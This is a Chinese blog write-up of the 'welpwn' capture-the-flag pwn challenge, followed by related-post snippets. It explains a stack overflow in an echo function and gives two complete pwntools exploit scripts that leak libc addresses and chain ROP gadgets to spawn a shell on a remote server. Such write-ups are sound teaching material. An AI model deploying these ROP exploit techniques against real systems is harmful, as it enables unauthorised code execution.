(攻防世界)(pwn)welpwn

最新推荐文章于 2023-02-28 13:24:53 发布
最新推荐文章于 2023-02-28 13:24:53 发布
阅读量2.6k 收藏 2
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/96425264
版权

首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来)

看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件:
在这里插入图片描述
我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故意的,考验大家 ,?。

拿到这题,查看保护,已成习惯
在这里插入图片描述
一看,基本的amd64-64位构造,没开Canary,没开地址无关PIE,就开了个NX,我们就能想到用ROP。
结果一查程序:
在这里插入图片描述
双击进去,(不仔细看以为是什么echo???)
在这里插入图片描述
双击进去,原来里面暗藏玄机,看得代码,发现这个函数是将你输入的字符复制到s2上,并且以0结束,我们可以看到距离rbp很短,很容易构成溢出,但是我们不能有\x00出现,但是,如果我们要写64位的地址,没有\x00是不可能的,所以我们就要另想办法。
还好,程序本身给我们提供了这么个好条件,我们可以看到echo函数的栈大小实在是小,只有20h
在这里插入图片描述
并且更要命的是,溢出后居然到了read函数输入的buf处,我们知道buf有0x400并且不被\x00干扰,我们就可以运用4个pop跳过0x20先,再调用通用gadget拿到shell
此题两种exp(其实还有很多种):

 #!/usr/bin/env python
from pwn import *
from LibcSearcher import *
p=remote('111.198.29.45',37921)
elf=ELF('./welpwn')
obj=LibcSearcher("write",0x7f8aeec212b0)    #这个得先泄露write的地址,也就是先运行一次再加进来的。
pop4_addr=0x040089c
pop6_addr=0x040089a
mov_addr=0x0400880
prdi_addr=0x04008a3
write_plt=elf.symbols['write']
write_got=elf.got['write']
print p.recv(1024)
payload1='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)+p64(mov_addr)+'A'*56+p64(0x0400630)
payload1=payload1.ljust(1024,'C')
p.send(payload1)
write_addr=u64(p.recv(8))
print "---"+hex(write_addr)
offset=write_addr-obj.dump("write")
sys_addr=offset+obj.dump("system")
sh_addr=offset+obj.dump("str_bin_sh")
payload2='A'*24+p64(pop4_addr)+p64(prdi_addr)+p64(sh_addr)+p64(sys_addr)+p64(0x0400630)
payload2=payload2.ljust(1024,'C')
print p.recv(1024)
p.send(payload2)
sleep(1)
p.interactive()

在这里插入图片描述
真就不是libc-2.19

下面一个就是用的DynELF的方法:

#!/usr/bin/env python
from pwn import *
p=remote('111.198.29.45',41724)
elf=ELF('./welpwn')
write_plt=elf.symbols['write']
read_got=elf.got['read']
write_got=elf.got['write']
read_plt=elf.symbols['read']
start_addr=0x0400630
pop4_addr=0x040089c
pop6_addr=0x040089a
mov_addr=0x0400880
def leak(address):
    print p.recv(1024)
    payload1='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)+p64(write_got)+p64(8)+p64(address)+p64(1)+p64(mov_addr)+'A'*56+p64(start_addr)
    payload1=payload1.ljust(1024,'C')
    p.send(payload1)
    data=p.recv(8)
    #print "%x => %s" % (address, (data or '').encode('hex'))
    return data
d=DynELF(leak,elf=ELF('./welpwn'))
sys_addr=d.lookup('system','libc')
print hex(sys_addr)
bss_addr=elf.bss()
prdi_addr=0x04008a3
print p.recv(1024)
payload2='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)+p64(read_got)+p64(8)+p64(bss_addr)+p64(0)+p64(mov_addr)+'A'*56+p64(prdi_addr)+p64(bss_addr)+p64(sys_addr)+'a'*8
payload2=payload2.ljust(1024,'C')
p.send(payload2)
p.sendline('/bin/sh\x00')
p.interactive()
PLpa、
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
welpwn pwn 入门题
02-11
pwn 入门题
攻防世界 pwn-100
weixin_56777139的博客
03-20 333
此处有一处值得一提,发送payload时注意sendline和send,sendline会自动在200个字符后加’\n’,缓冲区内则为200个字符加’\n’的形式,当复制200个字符串后返回主函数地址,缓冲区内还有’\n’,而主函数没有刷新缓冲区,所以返回主函数后进入下一轮的复制函数会将缓冲区头部的’\n’复制到内存中。构造新的payload,注意上述说的sendline和send对于此处的影响,若之前处用的sendline,那此处b’a’数量为0x48-1=0x47即可。此时即可接收泄露的内容。
攻防世界 welpwn WP
Zarcs_233的博客
01-29 920
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
rois welpwn -xman
u014281987的博客
08-28 820
echo 函数有栈溢出,把之前read的字符串复制到栈里,可素64位rop指令有00,所以根据echo函数逻辑,一个pop之类的后面的ret就覆盖不了,rop到此为止。不过看看main,木有截断哦,所以ppppr = 0x40089c这个就是为了把之前main栈里的24个a和一个pppr弹出来,接着不就可以之后写个ret,继续构造rop了吗!所以利用上一个栈桢是很有用滴,比如robot那个构造递归
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
welpwn::sparkling_heart:CTFpwn框架
02-04
welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。产品特点自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位...
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2043
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
ELF文件symbol分析
01-02
分析了ELF文件中symbol
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1353
学习pwn开始,慢慢来不要急
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2945
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 401
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 476
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 780
level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。 这里以leve3为例,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
攻防世界pwn100 详细的WP
Zarcs_233的博客
01-20 809
pwn萌新做pwn题了 首先checksec shellcode肯定是行不通了 IDA打开看看 发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节 查看程序导入,发现没有system,查看string,发现没有’/bin/sh’ 所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢? 由于是64位系统,所以得...
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3440
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
攻防世界 -pwn1
TedLau的博客
04-22 903
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值